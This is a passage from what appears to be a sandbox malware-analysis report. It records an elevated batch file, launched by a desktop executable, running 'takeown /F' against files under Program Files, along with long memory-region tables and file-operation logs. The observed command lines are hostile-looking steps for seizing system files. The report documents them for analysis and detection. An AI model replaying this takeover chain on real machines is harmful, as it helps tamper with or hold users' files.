|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #128: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #128 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Mail\recorder.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:40, Reason: Child Process |
| Unmonitor | End Time: 00:02:53, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x958 |
| Parent PID | 0x524 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
8D4
0x
728
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000c00000 | 0x00c00000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c00000 | 0x00c00000 | 0x00c0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000c10000 | 0x00c10000 | 0x00c13fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c20000 | 0x00c20000 | 0x00c21fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00c20000 | 0x00c24fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000c30000 | 0x00c30000 | 0x00c43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c50000 | 0x00c50000 | 0x00c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00ccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cd0000 | 0x00cd0000 | 0x00cd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x00ce0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00cf1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00d00000 | 0x00dbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000dc0000 | 0x00dc0000 | 0x00dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e00000 | 0x00e00000 | 0x00e3ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00e40000 | 0x00e69fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e40000 | 0x00e40000 | 0x00e40fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e50000 | 0x00e50000 | 0x00e50fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ec0000 | 0x00ec0000 | 0x00ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x010dffff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005230000 | 0x05230000 | 0x0542ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x053b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005420000 | 0x05420000 | 0x0542ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005430000 | 0x05430000 | 0x055b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000055c0000 | 0x055c0000 | 0x069bffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x069c0000 | 0x06cf6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6e0000 | 0x7f6e0000 | 0x7f7dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f7e0000 | 0x7f7e0000 | 0x7f802fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f806000 | 0x7f806000 | 0x7f808fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f809000 | 0x7f809000 | 0x7f80bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f80c000 | 0x7f80c000 | 0x7f80cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f80d000 | 0x7f80d000 | 0x7f80dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #129: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #129 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:40, Reason: Child Process |
| Unmonitor | End Time: 00:02:53, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x440 |
| Parent PID | 0xc54 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4F8
0x
3A0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000e70000 | 0x00e70000 | 0x00e8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e70000 | 0x00e70000 | 0x00e7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00e83fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e90000 | 0x00e90000 | 0x00e91fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00e90000 | 0x00e94fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000ea0000 | 0x00ea0000 | 0x00eb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ec0000 | 0x00ec0000 | 0x00efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f00000 | 0x00f00000 | 0x00f3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f40000 | 0x00f40000 | 0x00f43fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f50000 | 0x00f50000 | 0x00f50fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f60000 | 0x00f60000 | 0x00f61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f70000 | 0x00f70000 | 0x00faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fb0000 | 0x00fb0000 | 0x00fb0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fc0000 | 0x00fc0000 | 0x00fc0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x00fdffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00fe0000 | 0x0109dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000010a0000 | 0x010a0000 | 0x010dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010e0000 | 0x010e0000 | 0x0112ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x010e0000 | 0x01109fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001120000 | 0x01120000 | 0x0112ffff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005230000 | 0x05230000 | 0x054cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x053b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000053d0000 | 0x053d0000 | 0x054cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000054d0000 | 0x054d0000 | 0x05650fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005660000 | 0x05660000 | 0x06a5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06a60000 | 0x06d96fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ea20000 | 0x7ea20000 | 0x7eb1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eb20000 | 0x7eb20000 | 0x7eb42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb48000 | 0x7eb48000 | 0x7eb48fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb49000 | 0x7eb49000 | 0x7eb4bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb4c000 | 0x7eb4c000 | 0x7eb4efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb4f000 | 0x7eb4f000 | 0x7eb4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #130: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #130 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:40, Reason: Child Process |
| Unmonitor | End Time: 00:02:52, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x56c |
| Parent PID | 0x764 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BA4
0x
F64
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000500000 | 0x00500000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x0050ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x00513fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x00521fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00520000 | 0x00524fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x00543fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x005d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x005e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005f1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x00680fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x00790fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x007c0000 | 0x0087dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x008fffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00880000 | 0x008a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x008fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x00a87fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x00c10fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x00c20000 | 0x00f56fff | Memory Mapped File | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f220000 | 0x7f220000 | 0x7f31ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f320000 | 0x7f320000 | 0x7f342fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f348000 | 0x7f348000 | 0x7f34afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f34b000 | 0x7f34b000 | 0x7f34bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f34c000 | 0x7f34c000 | 0x7f34cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f34d000 | 0x7f34d000 | 0x7f34ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #131: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #131 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:40, Reason: Child Process |
| Unmonitor | End Time: 00:04:00, Reason: Self Terminated |
| Monitor Duration | 00:01:20 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x464 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F98
0x
E10
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x0476ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004770000 | 0x04770000 | 0x0478ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004770000 | 0x04770000 | 0x0477ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004780000 | 0x04780000 | 0x04783fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004790000 | 0x04790000 | 0x04791fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004790000 | 0x04790000 | 0x04793fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000047a0000 | 0x047a0000 | 0x047b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000047c0000 | 0x047c0000 | 0x047fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004800000 | 0x04800000 | 0x048fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004900000 | 0x04900000 | 0x04903fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004910000 | 0x04910000 | 0x04910fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004920000 | 0x04920000 | 0x04921fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004930000 | 0x04930000 | 0x0496ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004970000 | 0x04970000 | 0x0497ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049a0000 | 0x049a0000 | 0x049affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049b0000 | 0x049b0000 | 0x04b0ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04b10000 | 0x04bcdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004bd0000 | 0x04bd0000 | 0x04ccffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cd0000 | 0x04cd0000 | 0x04deffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04df0000 | 0x05126fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f850000 | 0x7f850000 | 0x7f94ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f950000 | 0x7f950000 | 0x7f972fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f978000 | 0x7f978000 | 0x7f97afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f97b000 | 0x7f97b000 | 0x7f97dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f97e000 | 0x7f97e000 | 0x7f97efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f97f000 | 0x7f97f000 | 0x7f97ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
